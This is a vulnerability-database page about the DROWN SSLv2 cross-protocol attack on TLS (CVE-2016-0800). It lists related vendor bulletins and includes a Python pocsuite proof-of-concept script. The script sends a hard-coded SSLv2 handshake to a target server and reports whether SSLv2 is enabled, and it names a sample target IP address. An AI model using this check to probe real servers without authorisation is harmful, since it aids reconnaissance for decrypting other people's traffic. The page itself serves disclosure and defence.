Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800)

🗓️ 02 Mar 2016 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 314 Views

A cross-protocol attack targeting TLS using SSLv2 known as DROWN (CVE-2016-0800) allows decryption of TLS traffic by exploiting servers and clients supporting SSLv2

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos Insight
24 Feb 202007:27
ibm
IBM Security Bulletins		Security Bulletin: March 2016 OpenSSL Vulnerabilities affect Multiple N series Products
15 Dec 202118:05
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in OpenSSL affect IBM Image Construction and Composition Tool. (CVE-2016-0701, CVE-2015-3197)
15 Jun 201807:05
ibm
IBM Security Bulletins		Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos TM1
24 Feb 202007:27
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software included in Rational Developer for i and Rational Developer for AIX and Linux
3 Aug 201804:23
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in GNU C library (glibc), OpenSSL and BIND affect IBM Netezza Host Management
18 Oct 201903:10
ibm
IBM Security Bulletins		Security Bulletin: A denial-of-service attack, heap use after free, network server exploit, and other vulnerabilities might affect IBM Storage Defender - Resiliency Service
8 Jul 202517:32
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Security Guardium
16 Jun 201821:40
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM InfoSphere Master Data Management
27 Apr 202210:23
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in OpenSSL affect IBM Integrated Management Module (IMM) (CVE-2016-0705 CVE-2016-0797 CVE-2016-0798 CVE-2016-0799)
14 Apr 202314:32
ibm
Rows per page

                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.poc import POCBase
from pocsuite.api.utils import url2ip


def check_tls(host, port):
    """
    params:
        host[str]: target host ip
        port[int]: target host port
    """
    client_hello = '16030100d8010000d403037d408377c8e5204623867604ab0ee4a140043a4e383f770a1e6b66c2d45d34e820de8656a211d79fa9809e9ae6404bb7bcc372afcdd6f51882e39ac2241a8535090016c02bc02fc00ac009c013c01400330039002f0035000a0100007500000014001200000f7777772e65746973616c61742e6567ff01000100000a00080006001700180019000b00020100002300003374000000100017001502683208737064792f332e3108687474702f312e31000500050100000000000d001600140401050106010201040305030603020304020202'

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(8)
    s.connect((host, port))
    s.send(client_hello.decode('hex'))
    try:
        data = s.recv(1024*1024)
    except socket.timeout:
        data = ''

    if data:
        server_hello_len = int(data[3:5].encode('hex'),16)
        index = 5
        index += server_hello_len
        cert_msg = data[index:]

        return cert_msg


def check_drown(host, port):
    """
    params:
        host[str]: target host ip
        port[int]: target host port
    """
    client_hello_payload = '803e0100020015001000100100800200800600400400800700c00800800500806161616161616161616161616161616161616161616161616161616161616161'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(8)
    s.connect((host, port))

    s.sendall(client_hello_payload.decode('hex'))
    try:
        server_hello = s.recv(10*1024)
    except socket.timeout:
        #print(" [-] Not connected SSLv2")
        return False
    except socket.error:
        return False

    try:
        # parse incoming packet to extract the certificate
        index = 0
        length = server_hello[index:index+2].encode('hex')
        index += 2
        msg_type = server_hello[index].encode('hex')
        index += 1
        session_id = server_hello[index].encode('hex')
        index += 1
        cert_type = server_hello[index].encode('hex')
        index += 1
        ssl_version = server_hello[index:index+2]
        index += 2
        cert_len = int(server_hello[index:index+2].encode('hex'),16)
        #print('cert_len', cert_len)
        index += 2
        cipher_spec_len = server_hello[index:index+2]
        index += 2
        conn_id = server_hello[index:index+2]
        index += 2
        cert = server_hello[index:cert_len+1]
        data = check_tls(host, port)
        if data:
            print(" [*] Check the TLS CERT and SSLv2 CERT")
            if cert.encode('hex') in data.encode('hex'):
                print(" [+] SSLv2 Enable - Same cert")
            else:
                print(" [+] SSLv2 Enable - Not same cert")
            return True
        else:
            return False
    except Exception as e:
        # most exception is "string index out of range"
        return False

    s.close()


class OpenSSL_DROWN(POCBase):
    vulID = '0'                 # vul ID
    version = '1'
    author = 'janes'
    vulDate = '2016-03-01'
    createDate = '2017-02-16'
    updateDate = '2017-02-16'
    references = ['https://www.openssl.org/blog/blog/2016/03/01/an-openssl-users-guide-to-drown/']
    name = 'OpenSSL Drown跨协议攻击TLS漏洞 POC'
    appPowerLink = 'https://www.openssl.org'
    appName = 'OpenSSL'
    appVersion = '1.0.2a, 1.0.1.m'
    vulType = 'Information Disclosure'
    desc = '''
        DROWN漏洞主要利用SSLv2协议的脆弱性对TLS协议进行攻击。攻击者通过中间人攻击等手段截获和解密用户和服务器之间的加密通信,包括但不限于用户名和密码、信用卡号、电子邮件、即时消息,以及敏感文件。
    '''
    samples = ['50.232.43.188']

    def _verify(self):
        result = {}
        output = Output(self)

        target_ip = url2ip(self.url)
        url = urlparse.urlparse(self.url)
        port = url.port or 443

        if check_drown(target_ip, port):
            output.success(result)
        else:
            output.fail('Not support SSLv2 connection. Not Vulnerable')
        return output

    def _attack(self):
        return self._verify()


register(OpenSSL_DROWN)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Mar 2016 00:00Current
7.3High risk
Vulners AI Score7.3
EPSS0.90348
cross-protocol attackdrowntls encryptionsslv2 vulnerabilitybleichenbacher rsa padding oracleexport cipher suitesopensslcve-2016-0703sslv2 protocolsslv2 cipherssslv23_methodsslv2 vulnerability mitigationweak ciphersdrown scannernimrod aviramsebastian schinzel
314